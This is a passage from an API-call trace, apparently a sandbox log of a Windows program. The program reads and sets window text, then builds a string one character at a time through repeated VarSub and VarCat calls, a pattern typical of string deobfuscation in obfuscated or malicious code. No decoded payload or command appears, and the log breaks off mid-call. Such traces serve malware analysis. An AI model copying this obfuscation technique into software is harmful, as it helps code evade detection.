lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0088.766] GetWindowTextA (in: hWnd=0x102c2, lpString=0xe577bc, nMaxCount=255 | out: lpString="Activity Arrive Event") returned 21 [0088.766] GetLastError () returned 0x0 [0088.766] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0088.766] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0088.767] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0088.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=256, lpWideCharStr=0xe3bb3c, cchWideChar=511 | out: lpWideCharStr="Activity Arrive Event") returned 256 [0088.767] SysStringLen (param_1="Ac") returned 0x2 [0088.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Ac", cchWideChar=3, lpMultiByteStr=0xe57084, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Ac", lpUsedDefaultChar=0x0) returned 3 [0088.767] SetWindowTextA (hWnd=0x2036e, lpString="Ac") returned 1 [0088.767] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0088.767] GetFocus () returned 0x0 [0088.768] lstrlenA (lpString="Ac") returned 2 [0088.768] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x3) returned 0x310bcd0 [0088.768] GetWindowTextA (in: hWnd=0x2036e, lpString=0x310bcd0, nMaxCount=3 | out: lpString="Ac") returned 2 [0088.768] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xd, wParam=0x3, lParam=0x310bcd0) returned 0x2 [0088.768] GetFocus () returned 0x0 [0088.768] lstrcmpA (lpString1="Ac", lpString2="Ac") returned 0 [0088.768] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310bcd0 | out: hHeap=0x30f0000) returned 1 [0088.769] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0088.769] GetFocus () returned 0x0 [0088.769] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x3) returned 0x310bcd0 [0088.769] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xd, wParam=0x3, lParam=0x310bcd0) returned 0x2 [0088.769] GetFocus () returned 0x0 [0088.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Ac", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0088.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Ac", cbMultiByte=-1, lpWideCharStr=0xe57084, cchWideChar=3 | out: lpWideCharStr="Ac") returned 3 [0088.769] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310bcd0 | out: hHeap=0x30f0000) returned 1 [0088.769] VarBstrCmp (bstrLeft="Ac", bstrRight="S ", lcid=0x0, dwFlags=0x30001) returned 0x0 [0088.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d", lpUsedDefaultChar=0x0) returned 1 [0088.770] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0088.771] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v", lpUsedDefaultChar=0x0) returned 1 [0088.771] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0088.771] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0088.772] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0088.772] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q", lpUsedDefaultChar=0x0) returned 1 [0088.773] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.773] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0088.773] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0088.774] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0088.774] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84", lpUsedDefaultChar=0x0) returned 1 [0088.774] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0088.775] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0088.775] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0088.776] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0088.776] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0088.776] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="a", lpUsedDefaultChar=0x0) returned 1 [0088.777] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="T", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="T") returned 1 [0088.777] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n", lpUsedDefaultChar=0x0) returned 1 [0088.778] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.778] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0088.778] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0088.778] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0088.779] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x", lpUsedDefaultChar=0x0) returned 1 [0088.779] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="k", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="k") returned 1 [0088.780] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0088.780] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0088.781] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.781] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z", lpUsedDefaultChar=0x0) returned 1 [0088.781] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="M", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="M") returned 1 [0088.781] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.782] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n", lpUsedDefaultChar=0x0) returned 1 [0088.782] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0088.782] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.783] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0088.783] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0088.783] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.784] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n", lpUsedDefaultChar=0x0) returned 1 [0088.784] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0088.784] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.784] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="t", lpUsedDefaultChar=0x0) returned 1 [0088.785] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="g", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0088.785] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r", lpUsedDefaultChar=0x0) returned 1 [0088.785] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0088.786] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f", lpUsedDefaultChar=0x0) returned 1 [0088.786] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0088.787] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0088.788] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0088.788] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u", lpUsedDefaultChar=0x0) returned 1 [0088.788] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0088.789] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82", lpUsedDefaultChar=0x0) returned 1 [0088.789] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0088.790] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0088.790] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0088.791] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q", lpUsedDefaultChar=0x0) returned 1 [0088.791] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0088.791] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0088.792] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0088.792] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.793] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84", lpUsedDefaultChar=0x0) returned 1 [0088.793] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0088.793] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.793] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0088.794] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0088.794] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0088.794] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0088.795] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0088.798] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0088.798] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y", lpUsedDefaultChar=0x0) returned 1 [0088.799] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0088.799] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0088.799] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0088.800] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0088.800] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | 